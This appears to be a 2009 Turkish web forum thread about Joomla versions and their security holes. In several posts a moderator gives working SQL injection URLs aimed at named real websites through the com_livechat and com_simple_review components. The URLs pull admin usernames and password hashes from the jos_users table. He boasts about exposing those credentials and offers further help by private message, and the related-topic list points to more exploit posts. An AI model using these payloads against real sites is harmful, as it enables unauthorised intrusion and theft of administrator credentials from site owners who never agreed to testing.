Sayfa: [1]
 
Gönderen Konu: Joomla! 1.5.x  (Okunma Sayısı 418 defa)
0 Üye ve 1 Ziyaretçi konuyu incelemekte.
prionace
Ziyaretçi
Edilen Teşekkür:
Alınan Teşekkür:
« : 03 Ocak 2009, 02:35:31 »



Download Resmi Sitesinden Joomla! 1.5.x


Download Resmi Sitesinden Joomla! 1.0.x
« Son Düzenleme: 03 Ocak 2009, 02:38:36 Gönderen: prionace » Logged
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #1 : 03 Ocak 2009, 02:56:40 »

joomla yı hiç ama hiç tavsiye etmiyorum.her tarafı açıklarlar ile dolu....
Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
prionace
Ziyaretçi
Edilen Teşekkür:
Alınan Teşekkür:
« Yanıtla #2 : 03 Ocak 2009, 09:58:34 »

bu konu tartışılır Gülümseme açık derken en son 1.5 de şifre unuttum bölümünde bir açık bulundu onu biliyorum da onun haricinde devamlı  güncelleniyor
Logged
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #3 : 03 Ocak 2009, 10:56:59 »

bizde boş durmuyoruz.joomladaki o senın  bahsettiğin açık token açığı ve halen var devam ediyor...

bak şimdi token dan sora çıkan açığı yazıyorum sana ve bir de örnek site veriyorum...

açığımızın adı Joomla Live Chat Açığı

ve bu da örnek sitemiz.örnek sitemiz de de görüldüğü gibi admin kullanıcı adı ve md5 i açığa cıkardık.gerisini anlatmamı istersen pm atabilirsin

http://camcilar.com/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users

http://venture-its.co.uk/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users

daha bunun gibi sayısız site.
« Son Düzenleme: 03 Ocak 2009, 11:03:22 Gönderen: amege2 » Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
prionace
Ziyaretçi
Edilen Teşekkür:
Alınan Teşekkür:
« Yanıtla #4 : 03 Ocak 2009, 11:15:23 »

1.0  sürüm sanırım bu sürüm dimi ? şey diye düşünüyorum sonuçta web master  bu siteyi yapmış vermiş bu şahıslara ne bidaha güncelleme olmuş nede değişiklik.  sonuça eski sürüm 1.5 de  var açık yok demiyorum ama devamlı yeni cıkan güncellemeleri yapacaksın.
Logged
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #5 : 03 Ocak 2009, 11:17:39 »

bunlar çok büyük tehditler...
Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
prionace
Ziyaretçi
Edilen Teşekkür:
Alınan Teşekkür:
« Yanıtla #6 : 03 Ocak 2009, 11:21:44 »

ya tabikide düşünsene adamın panel şifresini biliyorsun daha ne olsun Gülümseme  bu arada benim bu açıktan haberim yoktu bunuda bilgilerime aldım  çok teşekkürler. )
Logged
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #7 : 03 Ocak 2009, 13:23:15 »

rica ederim...
Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #8 : 06 Ocak 2009, 12:23:12 »

joomla dan  kötü bi haber  daha.yeni bir acık daha.admin kullanıcı adı ve md5 i ortaya cıkaran SQL injeksiyon acıgı.aşağıda örnek site mevcut

http://consolesports.net//index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
prionace
Ziyaretçi
Edilen Teşekkür:
Alınan Teşekkür:
« Yanıtla #9 : 06 Ocak 2009, 12:52:43 »

Kahkaha tamam tamam bırakıyorum joomla yı:D  içimi kararttın valla
Logged
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #10 : 06 Ocak 2009, 13:30:53 »

sen kardeşinini sözünü dinle...
Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
prionace
Ziyaretçi
Edilen Teşekkür:
Alınan Teşekkür:
« Yanıtla #11 : 06 Ocak 2009, 13:32:50 »

Baya Uğraşmıştım : ) bitti artık ilişkimi kestim . yeni ufuklara doğru açılacam Kahkaha disconnect gibi drupal mı uğraşsam ne
Logged
Ch Team
*
Mesaj Sayısı: 279
Çevrimdışı Çevrimdışı
WWW
Edilen Teşekkür: 7
Alınan Teşekkür: 22
« Yanıtla #12 : 07 Ocak 2009, 00:36:25 »

Açıklar kapatılıyorsa, Bu Joomla işini Mozilla gibi yapıyorsa sorun yok bence. Göz kırpan
Logged

<a href="http://www.oltaat.com/uyelik/tavsiye/reklam/728.swf?url=http://www.oltaat.com/?ref=25424" target="_blank">http://www.oltaat.com/uyelik/tavsiye/reklam/728.swf?url=http://www.oltaat.com/?ref=25424</a>
Ch Yönetim
*
Mesaj Sayısı: 590
Çevrimdışı Çevrimdışı
Edilen Teşekkür: 68
Alınan Teşekkür: 34
« Yanıtla #13 : 29 Nisan 2009, 12:17:08 »

evet   acıklar kapatılıyor ama en son çıkan açıklarını da bilgilendirme  amaçlı olarak exploitler kısmında yayınladım...

Logged

بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
Ch Team
*
Mesaj Sayısı: 972
Çevrimdışı Çevrimdışı
Yok mesaj felan...
WWW
Edilen Teşekkür: 131
Alınan Teşekkür: 100
« Yanıtla #14 : 29 Nisan 2009, 13:36:51 »

Güzel konu kanka saol çoğu kişi bilgilenir umarım Gülümseme
Logged

Cehalet ile deha arasındaki gerçek fark nedir biliyor musunuz?
Dehanın sınırları var cehaletinse hiçbir sınırı yoktur.
Whoopi Goldberg
Sayfa: [1]
 
 
Gitmek istediğiniz yer:  


Benzer Konular
Konu Başlığı Başlatan Yanıtlar Görüntülenme Son Mesaj
Joomla Nedir? Basitmidir? Nerelerde Kullanabilirim?
Joomla
prionace 5 270 Son Mesaj 07 Ocak 2009, 22:24:58
Gönderen: emresur
Joomla 1.5 de token Açığı
Joomla Açıkları
amege2 0 264 Son Mesaj 06 Mart 2009, 22:27:58
Gönderen: amege2
Joomla com_ijoomla_archive Blind SQL Injection Exploit
Joomla Açıkları
amege2 0 508 Son Mesaj 07 Mart 2009, 13:46:20
Gönderen: amege2
Joomla component MOSMediaLite451 Remote File Inclusion Açıgı
Joomla Açıkları
amege2 0 633 Son Mesaj 25 Nisan 2009, 20:04:17
Gönderen: amege2